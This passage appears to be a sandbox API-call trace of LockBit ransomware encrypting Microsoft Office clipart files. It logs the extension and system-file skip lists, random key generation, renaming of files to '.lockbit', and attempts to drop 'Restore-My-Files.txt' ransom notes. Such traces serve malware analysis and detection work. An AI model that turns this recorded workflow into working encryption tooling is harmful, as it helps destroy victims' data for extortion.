[0167.223] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00737_.WMF") returned 1 [0167.223] lstrcmpiW (lpString1="ntldr", lpString2="PE00737_.WMF") returned -1 [0167.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00737_.WMF") returned -1 [0167.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00737_.WMF") returned -1 [0167.223] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00737_.WMF") returned -1 [0167.223] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00737_.WMF") returned 1 [0167.223] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00737_.WMF") returned -1 [0167.223] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.223] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF") returned=".WMF" [0167.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.223] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.223] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.224] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.224] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF.lockbit") returned 72 [0167.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00737_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.226] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.226] malloc (_Size=0x40068) returned 0x3df0008 [0167.226] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=40492) returned 1 [0167.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.227] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.232] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.232] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.235] free (_Block=0x1fa2ed8) [0167.235] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.235] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.235] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe289fc00, ftCreationTime.dwHighDateTime=0x1bd4ae2, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe289fc00, ftLastWriteTime.dwHighDateTime=0x1bd4ae2, nFileSizeHigh=0x0, nFileSizeLow=0x1ca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00833_.WMF", cAlternateFileName="")) returned 1 [0167.235] lstrcmpiW (lpString1=".", lpString2="PE00833_.WMF") returned -1 [0167.235] lstrcmpiW (lpString1="..", lpString2="PE00833_.WMF") returned -1 [0167.235] PathFindExtensionW (pszPath="PE00833_.WMF") returned=".WMF" [0167.235] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.235] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.236] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.236] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00833_.WMF") returned 1 [0167.237] lstrcmpiW (lpString1="ntldr", lpString2="PE00833_.WMF") returned -1 [0167.237] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00833_.WMF") returned -1 [0167.237] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00833_.WMF") returned -1 [0167.237] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00833_.WMF") returned -1 [0167.237] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00833_.WMF") returned 1 [0167.237] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00833_.WMF") returned -1 [0167.237] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.237] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF") returned=".WMF" [0167.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.237] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.237] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.238] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.238] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF.lockbit") returned 72 [0167.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00833_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.239] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.239] malloc (_Size=0x40068) returned 0x3df0008 [0167.239] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7328) returned 1 [0167.239] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.240] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.245] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.245] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.245] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.247] free (_Block=0x1fa2ed8) [0167.247] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.247] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.247] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870c3e00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x870c3e00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1908, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00898_.WMF", cAlternateFileName="")) returned 1 [0167.248] lstrcmpiW (lpString1=".", lpString2="PE00898_.WMF") returned -1 [0167.248] lstrcmpiW (lpString1="..", lpString2="PE00898_.WMF") returned -1 [0167.248] PathFindExtensionW (pszPath="PE00898_.WMF") returned=".WMF" [0167.248] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.248] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.249] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.249] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00898_.WMF") returned 1 [0167.250] lstrcmpiW (lpString1="ntldr", lpString2="PE00898_.WMF") returned -1 [0167.250] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00898_.WMF") returned -1 [0167.250] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00898_.WMF") returned -1 [0167.250] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00898_.WMF") returned -1 [0167.250] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00898_.WMF") returned 1 [0167.250] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00898_.WMF") returned -1 [0167.250] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.250] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF") returned=".WMF" [0167.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.250] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.250] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.251] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.251] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF.lockbit") returned 72 [0167.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00898_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.252] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.252] malloc (_Size=0x40068) returned 0x3df0008 [0167.252] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6408) returned 1 [0167.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.253] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.258] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.258] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.259] free (_Block=0x1fa2ed8) [0167.259] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.259] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 